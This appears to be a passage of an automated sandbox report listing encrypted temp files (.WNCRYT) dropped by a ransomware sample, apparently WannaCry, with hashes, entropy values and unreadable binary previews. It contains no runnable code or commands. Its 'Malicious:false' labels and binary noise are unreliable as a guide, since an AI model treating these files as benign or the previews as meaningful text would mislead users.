                                SSDEEP:24:OqdeWDnrrHyQ8gJXPChmDR2zG1NXDvxOLfF4WlJanPqfdIN6f27:7hDrrSpT0DQz6TvCF46Jzugf27
                                MD5:9753D4C4157A6ED2089C56B3547134AD
                                SHA1:612F1C32DE3667B8702AA88C0920AF77F13F06EA
                                SHA-256:CD778D3622911E5DDD07BDC18A4F8477D3DA9A97A0865753DFE5169067A9B9F0
                                SHA-512:4F98892295B1AA5342158DEFB5004A63AB538D36CD52FE44DC1CAB16C95AD5728F89EB38944039456C4938F4BD4BD285298DCCCA5BD118106828677DAAF20BBB
                                Malicious:false
                                Reputation:unknown
                                Preview:.h.......B..C8$.!.$.}...P..*~f..|....{...{...6>.D._.CC..\..#..a.Lm^(...v.*......f...o#.911.e<tY..?`..z...v..cv(`...p.5Ra.=..d.;{..:L.B.H.....Z.../.0XK.....\.V..b$|/r6?..4...c.G...g.u.......)h........|..)....Uq..T.._..QN^.~;x.v...g....g..S.>O4;...k.8..]..z6.A}..m.u........$....a......-..t..e.Lf9..dK.#...%.hx?%....uO....k.s..{......9.c.MT\8b.~TW........o./]>.........}....|.!..da..e..C.FqoTm./h6...Jb.. ....l...A&.._<.z.E..!..>. .V...#.n~2G&ZG.y..xH.<.-{..S.t.2.."Ua.{.....=....W.C.i`]hIV...[.R1}.z".re..0..t2q.+....(....V..+..}jBV.d*s.&..e_..4._./.IE....,....f8.u$..)i.!.h.........[.."Oj.+......d.,.R.W....K..].....6..jAjn.mV.{j......D)^.f....&.t....|...JP.&u..._!..Z.r.fA+c..KB...G....f.6A..{...u.,.(..h../.)..........k..+.....W..qy....W.s\.h.]l.....J...B.'...S..k....!.*...Q!k...g.5.HL.....V...M..(..S..<..z....o.v..I...Z.....y..%.s.........LoEZ..a;.1~..I...C...2Tw.....#....2.\S..=...Wd.....Y.0..}.j.....U..\N........y....,...}.>^.5....m.t....i...

                                C:\Users\user\AppData\Local\Temp\60.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.807039241974979
                                Encrypted:false
                                SSDEEP:24:3/wAigFVAV4Q8ue9USlpcqroTMa/Yco4bJIGlRA8cJkIncQG:PiV4LtpcYay4bPAL6dJ
                                MD5:28ABEDDC7CD30E2CEA9273076138ED65
                                SHA1:E9D36F19CEF016E58F086E15E41561EB3C24AAAC
                                SHA-256:B0C691392A5AE2BAA6EEBB09DFF114E23EBA74A64CB96CB558BEF78FC5EBC9D5
                                SHA-512:9CDE0D0404469BB61EC877142CAEFFC9515F2C60078DDEDFB612286FC2F5031BB9EDB2C4B39037F3E492554C65E5B8453FFE1E8B6CB6E956CA4CE5DF75B44027
                                Malicious:false
                                Reputation:unknown
                                Preview:......-U*.rw...iV..u3..+.K.*J.....".B.'..m..~..Y.!.L..x^..%................. _...d.g~.xD....|H...Z$.P.H....!.../.]..q=.Z.k.,V..[.....`.....|.pA..n{.9.h...........t..6....,......j..{..Hz.3..~..'4......F1.. }w.....C.........q.c.1<.......9v8Q=..^Z).w......IH....\rE}%>.b....;j.9.1..#...AP.y....D.n.....T6...=.r..d........phr^O...z.j.....Z.~.G.qM]?T1-.r..._).R.mO..I..6.8k).z.H.G.<...\r.D`-Cr5.....a....aW.......p.$R.......;(./........s...Ju..........)IF........0..R"J.o`..;y\H}.G.....>&._.n.#?".....ha..!.Y...t.W..[......Uc..FB1.u..d.........._......&9_..J;.R.Ak.xY.e...2.%.Ll.z~^.....+...e|....^..O-TH8..G...s7..0..#...\...}.G.h.u./Vy.W]....C....la...;,......:..[..U.#...nH..-mtK|1.....k.d...T(......^[..7......K.<......k.l...d..!z.....W.d_h.T..U.#=(..........L......*.....l..rVh....F.?.Yx3...Y(.J.....1o.."H[3..~o........L.Y....M.F..(.:.N..{.\.Fx-..L....Q...N..4....0Ag.......y.,.e..cHc...M.a....@V..\...Q.D..r.c+0...U.\...k.S.dA.]...Q-.a.........m.64.".

                                C:\Users\user\AppData\Local\Temp\61.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.813992415166788
                                Encrypted:false
                                SSDEEP:24:KR2ukTravRDPhAT3KXJW0bp9Yy+zQGBupSy0sltI+HGz:KR2DTraPATad9YyBausCtI+8
                                MD5:F56BBC05AA259652819874AE0D852CE8
                                SHA1:6241529FFD94507DB2EAE38FC327C9AF16BC7A9E
                                SHA-256:9F66F87C21B9BA46BCE444C5D29AFFF55BF2386B998D0D0F674E295042C2D8A8
                                SHA-512:C05E8A62671EE276443C3820F669092101A8F2CD6BB97838355A192E48B2AEBB2EB57AD85A3C7B948ADC593FC73F620FF9A3E2339C7AEF39AF74C7917A5A59BA
                                Malicious:false
                                Reputation:unknown
                                Preview:.N..9..i|..9e9-...G.Li....w.S....z..H...`..9..1......&C....x'].!..l....;. .N..[......@..C.V.....*1;..P....:Q..M........+....j....O=m.....<...z"M......|l.\PC....Y`t.".5*.\...^8D...J.....O.{|...N7.J...H..nK[_.t...CwB;..".5xf...84.{%;.6..aHF..a.........{...z...""+.q.)....[.<......b....O..x^xsD...l....."T.M8.Q..!-.4r..u:.7h...R>K.mA.\.C./.....R-...._7Wt..`........[b.....3.9...2/..X..y....R.C...3J.0....Sq......j..)C.0?.FR..S.V=X)mM.._....g.d.DH....?.....' ..g{|8$.5.4..S...WI.7.n..{........"...,j......K.Q&r1.luC.s.T...G|..g..O.Q.:..;&..+L.a .b.n....C.T......P.o...$.S]p..'......h......?.t.h.}.#@J..Q...{.g-\..F.]W.....0~.5..r...6..=f.$>].x8.r.K.$.3:Xo8..E.M`..B f.*.|k..Q.#.tLdh..o...e.[..R.....a..d.;.5S..Vd.Uz-.A.=a..>......4..tY2...\r.Gv$_6...`..A.WG..8.....K..h..b..u.+...6yd.@.4.U..d.......%.X.&...Q.0vH....v#...1.2%..q.7eDO{F.f.D?/^..!.88......1u..r......)Di.H.ue.........Q@.4.......S....9.g.jf.?..S.Hd?.bb.......v.A..Zx...;...+h..T..I\v..N.

                                C:\Users\user\AppData\Local\Temp\62.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8221945248161004
                                Encrypted:false
                                SSDEEP:24:sen4xpSkY7xt1MS9zTq8MOVYsRFREaQjwtqsCvq2:senopa9zJYGFpQTsoq2
                                MD5:E04504D117FF1C640ADD01A66F016303
                                SHA1:3998EFC829A74687D2220211010E3179C55A1516
                                SHA-256:F80108933806A316D083289121073D78F6501AD3AD9220F4D2F6644842DED102
                                SHA-512:326AB37575F51BF7E567913FBE584AB77322FCB0A694BCB4491B83E1472FDABA55F95AB36E71DB8FB45F517BA6846C2FE264DC95BA54B763E88675409777BA85
                                Malicious:false
                                Reputation:unknown
                                Preview:UN.i.`.......u..(+.....a...e.M....i.aC...Lr...B...u.l...f>U..Q....O../.....\...A+.On.|.[....L.A..YS..C@..J.....9m.1.g+).......x..)t...D.j.Y.7.o./}.o|\.S<....8.......~..v)..n-...d..Ym.n}..(s.f...z6...'FQ..X..].G.64c/W..&d.v%.w..A.;.j.Ub&._.....Xv..T.....&hN.rH....,.J...{PR......o.M.g.h.9(.>.,.....]...U.P.p.....^.W.V..!E..f.........x.O.x......C....jm..CP..#...S..B.n......Ti....zW.z'.|.@7_...$...tX..{^....~.....ZMv...D%.l.6y..?.JQ/.|.!%c...........%.z..8a$.Y..........a..J.s...."..]..o^....!/#..C...g.........u.K.C....\>L@.2......K.6..7.....sUy@e./r....o.+..ai...n._x...w..Y.JV..E.-...}t0...7!....%J....f#_...I....l.o..@=m.5...C\.N.-....e@9...;... .s..X.Bg.u\......".@3...d.......".@..?xRo...OdX..V...S.V..d|#..`*.r....W.Ow<.>.Nfg{O......_..;xZ...N.}.4.M....2..[..Z......s ....2.{",.V.Q....}x...T.)D..z.@oI.a..l..=..}.....q1.^...N....[.vn...........ZD......G&~%..|-4Y...:..|.....\.]k.G.....l.5N.M...Xb..z..Y.:.w.H....N.v..-...F.=...lv.(7(..)..].

                                C:\Users\user\AppData\Local\Temp\63.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.7981482626715035
                                Encrypted:false
                                SSDEEP:24:3FnKcCN1iRGrGGykz9poRMe59JBF4SwgRcLQgfR0an:AcCN1iQrtl9poRMeV34bgRja
                                MD5:869DE36ABB794747F650FC31F8ECCB8C
                                SHA1:C3979F7A8DBE909623C87FCDFDA249C586898487
                                SHA-256:3231296BDBFEA2041801C7CA247C0E4876021ACD4E7CF34029F4B478DBC4B2D8
                                SHA-512:8F12002E09759C839107A12E583EEDC3C4B56CAA6A415AECB5E875DFD876B52724E9D4CCF27042DD3BE83D23513693E4C32C98A6E7648573A5B88FFC143CA2BD
                                Malicious:false
                                Reputation:unknown
                                Preview:i.....?.K...H.B..nf..Fm..E.t<.,.M.P...b..7......W..A....Kby.!.......`d[W.F9.x....8X0.yS.UG.;.m2U...^.......b..0...p.2>Pn..jheL.h......*-x.w.u9...J....E..G...sc.0j.........U..\..a._..N..\.#y'.......x..aa........j>6<........LO....l.$.V9...zSv&..Ex^...x....*...o.`....x..-2.]...s-....MX..S.2.gL.B}r.(..n3.q.N.kb.QC7:...E,.NmQ..~.~U`V.,+."...i...a)..`.1.G..W..X.((.N.1.T..2..cn...D..Nm......;.Y.8j.......j....F>..S.._..KV.(t./..0.......t..p.R.e'..A...,c..5(.Au0.28,ih7..v..L/.....o.*d....._...w.X.,...e#.]z....u.....T.....sn0.v.... ......5._..N.V...[W..Cu'..Q.%.D.<.i7.I.2.|1..9`U.M.*7.k.I.G.3*.0'..7..~..H.....Z...s.Q$:..>..Q.#R......kB`.e..dt.IY%/..7$.VK..4p*..h\5.!3z.!Kf.T.(;L.T....zN....1b.........=u2.B.[./F..mn..4).)i....b..a.rb.[...\....z..Z.l...R.$.GjZU..).}..._......0..|..AH).d.'....8....$.....Q`Ci68iw.>@.A..K.q.n|..G....[(.s..7..:...D.9z..;......<...p..@.P...R.pT....q.=..!.#+...i.9..ry.T.U5>..}.n..}f.8_.,FT.....D.BFb..'&.....-...u...=.0t....D.S..

                                C:\Users\user\AppData\Local\Temp\64.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.809823740207784
                                Encrypted:false
                                SSDEEP:24:d/0XDribk6VH7RnvQKduSCYnrr4B0JTLDTZkPMLUxEyOpIz2G81L4j:iT+tFopK4YTGMgxIpQoQ
                                MD5:A52628A59EA347A54B21CA923D0FBFD7
                                SHA1:40F9C8382A35A4E43A661B2F7DB3A0CB48146293
                                SHA-256:E0F23E1E08B72EA7FCE676DC3783CF78C29C599E8F844704522E4807507BE3DB
                                SHA-512:D43704526B44C52F25706A569127F073D7055ED9DC163C114B8E98B251FCB3E305AF0B90FEE39184C909F0DE4287C5B1E83BAF36C0A3D4B6D515C70B5374E77E
                                Malicious:false
                                Reputation:unknown
                                Preview::.W+...'...M......l..r.f..r.$J... ga.2...k%.;X#.y5..R.......)T.9..5.&.(..4.:......'A.!...._M....D......H...\.>.(..zo].0{.~...)!+.VO.Cu.~.^&..um..R....(|.'(...p......p....g....k.p..4.L.!9e.o..B....@....l..Y.18.gE...R.T.m....c.2..F....~.ooUG`..h..:."T.N..]..].,2..nV...`.......V...4..z.6..4.oo...)/....o..9G9M....(..)Z.....;..!7....s$.....h`......Q..D......?./..e{.^...../..;..4*.X7.U....u....T..w......Y.}.....u....M.l.9W...).UR.....z.lW..r..2..w,.3.k..YV$!.oqO...L._`.....c.mU...j.I...eH..G..:O.3...u....e..4i..}.Z...E./.B8xu..5).= ....w..ah..w.*52'.d..8yK.....6.o.d..G.M..T.9.u.U.Y+..9>..r.......=...j..QE.:mg..S4........wc.e J..U.?.0|.p4e..~._....].&Z.p..`...]........^.-K..[.v}^m...{.6...=....N..$sI.h5S./....c^.HM.:q.AN.;oa....4...t!.t<....u...8x...'g..6@...9.q..Z....U2*.}E..YH1.g..'....N...j).....o..Lq....._.PztY...@...57... .Ka.....{..W......b.ojrg;}M.7j.....:}......u.E.....G..[.....d...x.....l.<n.......b.D..e.....@.'...1..9m..s%.

                                C:\Users\user\AppData\Local\Temp\65.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.823236884267783
                                Encrypted:false
                                SSDEEP:24:gzUnrM1bUIHYndit0DrQOArGWD7trMMwZbfOc2MSBC2ugH6hOi3oa:g4rM1bNKQtqr46k7yfZbfOc558q9
                                MD5:4EF7035955F13ECF7C0C2A3451C01E91
                                SHA1:5E6DDFA177EEB10C0AF3B8EFE7A23B7E2C4FFE9A
                                SHA-256:F2525F0C7697DEC16A532C319E282471A97944A6C74132B0907E74A1AED22342
                                SHA-512:292061F65DFE9BD8785134094A527327E4BD81C174C241C4A4E7CBCB1C49C4F629CD58F6DD7872F6F400ADBCEAD0307C2406C3A0D29C2952159B198E302B50EF
                                Malicious:false
                                Reputation:unknown
                                Preview:..."\..p"..0P.Q...oA.o.O...kN.1..1..5.~f&Fz.e^....9 h".@.... w......toK..v."..7)`.Q.....5..........j.,..6X3....%........N......Z......X1...)hK.h{.|.6.....<a.T.l.~.k.3..Q..=J4......3E.k`..@..R.I...]R).Z"W..Yu..dN../......]...F.@8.G.N......8g[;..=.....(.........j./a...F.IwP......4./....'.........V.9...z.T.,..X...$......j...8.L...W.G.a.Eu$...e....Z..)|.N.d.m|?.C..y,..9.O.......j.H.c....=..C`.A...w...\..c(.kr..R'.w(/.8..{....B.z#n..,N(!9....=.#<r....9..*>.~J.../..Nb......e.s...^k5.F.z!C..(uh|....J..........g......?..I_B._.I..~..v!..Z..........%...z...w..o7#....)..L~......w+.".[r.../{....f._HA3..H.@.U:....q*.....&.....RQ..'.k..FX0.).L...#W......s>.xB.0...^.~.4A....V!..p.(^.A...?...EM..]..mb>..%.l...~....<...F.=X..*.fD&....1..3..4....&2[T......IOa.*..}uY+^#........?_..II.u-.jF5...{a.+E....Dm..).....k.4...dFs..k..uC...L... .1....2...7(..C...........Kk.Hb....oT.......5..{.T.+.....#..F.J...^..E..8.\W.WB.....d.W.5...T..;..".

                                C:\Users\user\AppData\Local\Temp\66.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.808499372351159
                                Encrypted:false
                                SSDEEP:24:4A2tf8Kfb4rT01v6RinnoLHwXMCgPNqOKVw:1W34rT01v6SiHKMtPNqOp
                                MD5:E8BE837A28138A93595B8A56E959F0B6
                                SHA1:86FAD0D7F15BE9024D32A6A2B2143C18E61275AF
                                SHA-256:78960E67EE8F3F3C39B8CFBE165B14F8AB36CCB4C36BF50CA6658879DD2450CA
                                SHA-512:542613F56A999C5DBC0754BEF11AB92C1CDE7AB2BCE5EF0EB2D8BBFD59A11E5841C5ECC811B1B8458C75CE4770C1B5327769C1F9DACE3A4C910CCD338903B9DE
                                Malicious:false
                                Reputation:unknown
                                Preview:........J.e..O...0.....cr......4...D<.~.7.N.H.S.+4c.`.hN.qp....t?....G..~.p..+........Y.K.}.. :...PY.@.b/.I.*s..N:.F......d.y.....h......4.Xc........:=.P.i.!3...t.&.E...Q.=.U.....v14....j.K.'C*^+.]..mj..l.b=...........~1....l=..AQm^..x7..?@=... a.s.h....V%`........&.t.l...X...H).].....&.O.K..7....P.z{h1....2....K.<M..5...H.mg_.......y$|.P4+...j...;B.@......R...... ....,e..).e.Ii.t...AL.5.....Wt...!t..\1..Q.3...)\D.c...>4;4...'.y..Yh.R......}/!=...R)..l."=%..0z2...S.f...._>....T........z6.5d%.C."...b...>.tN......Y..7.."#x..r..9.>...}..cP.q.X........._.^..4T-q...Cr/.F....Y.7.....=.|~...^.,v.S.uQA.|.?......2.T../.=2.4...$?./'.x....&.".%R.l.....llI..?..;....[.P.~......]....Mz...A.C....4.W.h.!dF.~...v.,j...F..Q.....@.K...$.L..Y....uO.)...TsN.`.gx.?..I..I^!...S........=........;.FO...X....?.4v...@@d...~.V.CQ.CJ.#U.....m...|..Lk.WL.K.Ww....F..5?.n......0...6RM~..2I..=.;....gB.(.T.\..u.@u.,.r.Dr..o.5..1.5..7G.q..V.Z..._J*?.......w.......

                                C:\Users\user\AppData\Local\Temp\67.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.806888303472629
                                Encrypted:false
                                SSDEEP:24:+gEtsguX5Q5pU3TtR5sPXUAGpgjnsxAE4A3fmEJUjA:StwQUzAUrSCAS3OeUM
                                MD5:37C12504FA4DC2380DF151BCC7C0FD83
                                SHA1:8B5B911BC075F910B5568E5B93B76A7BDD4A4CCE
                                SHA-256:979D3A15204450A33D720CC06E30C09F83D5A76BEC9B8975EFF0400368B367A5
                                SHA-512:212F20762CC43363DE0541A23F698C008DADC46C934F59432CA2605233D06B2102C6F1969401F624E2968E0E9E7AD5EA5143893DB1596B292C23F8CDE3F45211
                                Malicious:false
                                Reputation:unknown
                                Preview:?.(,%.8..Z...)A~3~C.8.?.g.s..E.......i....f.(.3...~Nf.&w..L~p..g.5.......-.[.../.......&_Q......P..sI......D...T...-...o.W.X..'o.q[.,.am.......X...a.A.....R3...j.l.6.p.Gh.0Z.b......9.#.3.C?..K.a...P.Y~.+.F.nG..TmZ...T.......:5..wo....;.k.K|by.6:....y..s,..6Q...p.Wj.B.p...!dz]...?:...@.....V2M....]A......Pu.d..S.3.B..h...w.H.%.n.QO...n..m..@...N.E........Y.9.y..4..F...:..hE9X...R.....kx..D....-..z6.U...2.S.z.....8.>......Z.....v&.]U.W-.C..h.....b].n.$r..3.2...?V.P.....X..yd..F..Z...<w.S....>G./..b+......a...'.sna(7.69.#..b.Y...A .;.c.qs....@.{..&b.....g.:..jg....j.D.9v..w..x9..3.E....A.~..$.K..!.ul....N..M...3.]2..G.BMc.XE..1.c...ZP...q..\..;.......<.&......t....re..Ad...|D..I.b.w7>j..3....2.........$.cm..."T.<..1!..d,.&...*......X..[..'.=....&!..1....~!.....64F.W...+.. <...-Da.8F.S*-....W..n.Q..o.;..x....I...%.wW>%-.T..5.y&4.o..,..t..5c&gFn.Gx...5.%.,.T..h........FC...@E./=V. ..."O.9...m..'..9 .z.P..Ig.t.XHo...G.oy.q...T.K.=E.t...kX.Y..gUK.M...)(.p....

                                C:\Users\user\AppData\Local\Temp\68.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.820779399481449
                                Encrypted:false
                                SSDEEP:24:gXj0xvUBbzYZXcxMN4e1GW6Ly1Fo4Jc/59OT2zGeXo:0G8XCsiGe1GWvFn459OTwXo
                                MD5:40C34DD28D81C72CD473D8DD3830E709
                                SHA1:DB1223BC6071DF290993F449C2C78BFB894FB0A1
                                SHA-256:B0959ED55C1291282EE4DE0F9447DD0882E6CF7AB5134E2D2690A90D116E9486
                                SHA-512:03B73A8BE5E816BB5F68936A323F32C5A53AB7FB3D572879056EE9F7C0D0104746C280B232BC9403BBDB47A5141CA54B5658848048E44F25B964D99457DCE733
                                Malicious:false
                                Reputation:unknown
                                Preview:...?..d..L?.<.M.gv...8.&.X.^/..;.NS...0s..>..c#.b.?#....C.'...rz..R.S1..A...k....r..b.#~|..P)..,....=..W.L...K..M.%'v...y1J..Sd..Q.c...|1.u........^.N60..c.,,.D...m{.52.`.L..d.....i....__0..."f`..*."d8...K.o,.i..8.:.....?].3.;..........e..O........[3......l./Ym....c...p.i.8?*.I....+.$.!..!.....-L..+T..}B..WNu.5...X.*.O.........Y).K X.>..5.....wQ0..5.B...a...FpeC.G..c.3&f.....mA...\....jM.{..B....9....z.=...ECOa4`.t...X.Q3hY..%.p..........S..I.}_.;@WP)._.......#..X-([.1.....#M./.....u.i%wD.4.......gy..>....u...A.v."...@e#..lY..#M.F.>.~(8..,...."O...........FZ]j...G.y .%...q./.M9..... _.........Yh..v.\.....<{./.0.^^...Z.....T.G.d.B.......l...6.MY.).....,....7.M.D..z..a......_.xp.......4..q.<.......$l........o.'..h.p..5........J'..B...z...:8..}"Jc.(.tB......?.H"..i......tm..x..VF.A.hV/[E..8.DtY.j&.$t@...8....K...8.f...c..._[..Wz...1G.}.A.9..r...Z..a.G..a..........O}...E...&..V/.......~...j....!..Ig.....G...f=.._.u._....{]n.;o.G2.N...

                                C:\Users\user\AppData\Local\Temp\69.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.803839159576599
                                Encrypted:false
                                SSDEEP:24:OXRanQgEW/eO/F24haW7NnxrTvdGflk45:+c1Ek7TVglk45
                                MD5:2714174E0D41631FFF1564FF2BD5908E
                                SHA1:F03CAFA4B3F625588D5DF6B52E2C4149B8C60304
                                SHA-256:DC646EFA561CCDF162414484FCB92A013D5C6C45F6DD19BF090367AFFB4A9C82
                                SHA-512:8893E1D7BCD2DBA65ACAC05FF45CD314469007D454B40EED5F824D3EF99CAC7FDC00ED94133CD90B857B3EC2B19C2F77E098F8FA303FD8836A6EFE849573030D
                                Malicious:false
                                Reputation:unknown
                                Preview:..........V.......{.........z.K.r....)eZ;...R......./.....xk.BL.c..=.G....8.hS.....@.h.....x..;.U...sU...V...........AX.~..#X`.".i..w.PS......#u..?...=..W.....X...aI.[6....H!e..e....p..9fc...K.8.%.s.=.NX...T.].P9...%6.!.:{.^..1..B..O....QP.<B..q....T.p>.J...... .......{..\.....reJ. .B..0..w6;...f..L8.......+..95.%...2^,2G...+.;V#.n..I.<..3`vlJ.X...V's..z(l.s.&.9..8..Lg..;T.Kpd...w.....^...Z.8.4.U.sMP.gh:R..f..j.;......`........j.|0.;.8.E..R....g.#..M...6I....S6G>}..........)...U..D....}2Z...\.0g..&...n+u|..{.lb.@.uM..0Ma....:ezo..e~9..E.h6..S....[....;..i@P.K.6E..../<..H~u...u...0..U|.'.4..6.@L.O.K`......I.+.DI..<.=B.I.R;z..'...*j#.....=.$>p....Y..~o.U.CAu...,l....0.3.n.Bk.J$8..u....o..d.^?.v.BhrT}+..d3 ..j[....aq.r.i...7...n.......l.0....F....PF.........h,.n.T.g........]..;h./...ygU..$2"....S..$...9.H.v.(3.D...IO.s..R.4.uv..c..D@c.....7...y........T=q.........qP..+..{....A..E.'...O.X....=\)..~...sx...1.xL./2V........>..E..rU..d..:..

                                C:\Users\user\AppData\Local\Temp\7.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8083849960197
                                Encrypted:false
                                SSDEEP:24:Sxl8NHhKKLPXIdst2D75YRikr5JTdrtHgjTCaUNpCl:SoBK+05YRHrXTDHO2Npa
                                MD5:857A0F426BD07D4B6821AB6518D5676A
                                SHA1:BB5CA9DFACDFF75AB5CDFF0ECD96BB24C395C3EA
                                SHA-256:8D25A9D900AA495F6110BC39CD296F965E7F612BC9C769DBE0D169BD06F94557
                                SHA-512:3920A28AAAE99B91DC1F8AB01004264165CE73A5ED15090D4E26D485EF70B98210E548695E09AAF2CBB6621294DFFC13B164A11C73B272B0BC0E3D00F5058B31
                                Malicious:false
                                Reputation:unknown
                                Preview:.C~...=:U...]b{..y.o,%....I..A..dR..V.z.B.@H.;.J..#......-~.K.s~./...WpT...T.'..1B.C.......m....y.l..Y.2di.m..C.....W.>..b....P>..4 1.q..!...].|.h......e..4}.x....e...G.......~.%.9...........6..q....p.<..Q.4...:.7...e.._..|.k.*jet..X...?..........1 <d.....Gg2..#.>..k4ox]..f...#.;.......U.>WA.U.r.._.U.=8..q./..{.......5.T.?...).7.H..Z.....z.Lv<p96...h.+I....`....o..=%S....`.M@.1O.z..................?...J..2GYq..P3.^.rk.....dB.............I.+../...N.@o~.c.m...,.K..F....@s.pK............o...Q.E.&.9.&.C..h.~..q!z.xz.X.......v..u..u!a.H.;/..f[.=.......3(....F..N.....(....<......o...1..T.6..u.L(5A.....!ow@.....v...e.Xu..m3..,.y.......|W:\.Bv\. PZ....._.}>5R(.........Q...;#..|......%I/..R..{I.t:~..M....wa..Q......2..6..-...h,.Q...(...r......{AN.G..x...p..Cr!-.c'_{jc.....tj.m..G....%..i'.X..U.......2......7.%L5......E....: .....oE9.....,..X.3%.4....H@......z....D...(...9m.dk.....S...!.d.\.3..i.f......212..fx....g.^....!.;...k..VZ^..

                                C:\Users\user\AppData\Local\Temp\70.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.790795120732516
                                Encrypted:false
                                SSDEEP:24:7VkLSXZLDFkhMM5TnLHYB8KxAUmmxoCINndKwxd:7VkfZ5rKxA/mxovOyd
                                MD5:E5CD8FD465C4528F8522CF128DFEBB1A
                                SHA1:CFA2072DCDBDBE506C92EB8E6B1FCAB5F20C0314
                                SHA-256:57FC1A6DC1DBF01392A4B19648246ADAB9AEA08B79C7BF0B8D85F30E99A6F372
                                SHA-512:9EB3BD99790B713F9014ABF644E46DE4B09210985D09F02D1D65168A8FEFF3EC2CDF102641D6E376F65EB4BFE5D388E7004FC79FD1111AFC2DA771D7246D371D
                                Malicious:false
                                Reputation:unknown
                                Preview:H.W.VB..3,+{...9j.v8.....\..7..L/.0%9.~...G.j...D..$r..M..,...n.A.y.$.V...x.4,(*.f..`...k..2..=ut....].q.....1)......c.$.H.....U...[6.. &.".......x...U5R.cB.!u..._w.tK..w.z1...{N.a%<^.&.'m..c.......{LN%\s....,>...AET.D..1....h..U.....1....a.Z..p1].!.q3E4...7..........c....^..5Kn.y.....3!Kpr........7..|......v.8.?;k.(B."....m.KV.....Zg..W....k.......v.......u.\x....H."..FE....y..9S..7.\.......s_..p...h...Y[..~( j..4oq>..hcuk..*.....Q1.|. ....(.O0..a......2.N.5F8&...G...;....yG..}......{....X;P..pn.S^.M..0..*..d4.......<..&?.&.].1.rS].:..At%..Y].]..\"..VD_F.e.L.n)..5u,.......S......`.{X.X.P.^.~X.Y.wgk&...ju.(.c?T.6..|#.v..E...Pt...N`.l..&.F.j{z.j..g.L..\.V....X..t.x.2y..`\...*>...n.A.Y...sf3..+'%..nN..s.$.....<y.CD.:..."...T.n..{..&_e.gv.F...>...T.)..#-j...b.....Mo..;.p.^...]%8..2G..-..s.:../B..niY%.n0......H......%DM!....~..;(..0.V....\..l...uK.f.?..yG..C).@...ko..]T.C.iRJU..0.d...o)..7vt..V"./<...P..8.+.v....brA`|3@.fW.|.kk..(>Y.."L.?..\`$5.

                                C:\Users\user\AppData\Local\Temp\71.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.82207212013011
                                Encrypted:false
                                SSDEEP:24:rFUOk8dM9xQyrmL39okFEbtPJIq0+N/8IGvfvc:tMTZENokFSIq0+mlHvc
                                MD5:828D31DA66A5504D8D69856C51B359FC
                                SHA1:FA907290255F3A422536251BE08B706EEDC7CCEE
                                SHA-256:4210D3C99EBEBC861EE86D3D4D560C478D352B8A5DADBA133A2324A074F030BB
                                SHA-512:5424D009AF677BB01ABB96D234B0ECD116932E89EFADE7E0AFF0FD83E6EB35482402F57536267247B214C028033E35827ADE30EA728A0290858D49515581AC2E
                                Malicious:false
                                Reputation:unknown
                                Preview:..........O.@....ZB^...c7.F9IC...[.........p.T.,....Z.z....@.{..\.9......:...o..YG..lb.iE{..4......T...1.`[.....*./'#W*%y.D...c.|.....e.......i.u.. ..C....9/.j...[..z).$..B...CO{(......,..s.M.......[.^K.X...r.U.m.cp.........N...p.....3.g.vK.....I.L...k.q.*.b..4\..I.Y...cG.Fs....Fpc.E.;...o.gyA.u.ZA.i..<....6'.M.!...Ow.4:..x.x...H..............?L....D#._...2.X..}.9f......Hd...Yy..P2 .G...I.Fg/Q.jW.".*.~.7.-........v.'D...i.j.....5....#.Ywl.......:.p.2.^....P.....09=..6..e..n..Z;L._....>.u........6-D.....K..q.d..ph...9...4....Kt......;]....{:.GP.*.)6V.#...C...i.)-.]J+4..:.~po...gU.';a%u...."nV...W.W.I8....dr......P*.=I.........j.n...c]f.....:.1..&9.......N%.\....]....(.F..|.4.....i.m.c[=.+......u.....=.0.H|.w..So-....5..9.....j.,n.b......V......&.3-R!..#.Km..N..,..$.IM........4l....kMO85.$BX|..].4-.L.&.......U4.E..&...x..5.cN.|...........J....ymf?t.....".b........>8...z..A..+..@..M..|:..G..0.[.W..g....f..Xb...[.(>.K...>.P+}.8)X.V=W.R

                                C:\Users\user\AppData\Local\Temp\72.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.797520945849408
                                Encrypted:false
                                SSDEEP:24:yJjUwxn3Tr3/dPEEFZpfJ7TU1E2YJ1X6mbJvhFW:yJ7ZTr3/dPrZpRnn/J1tbFhFW
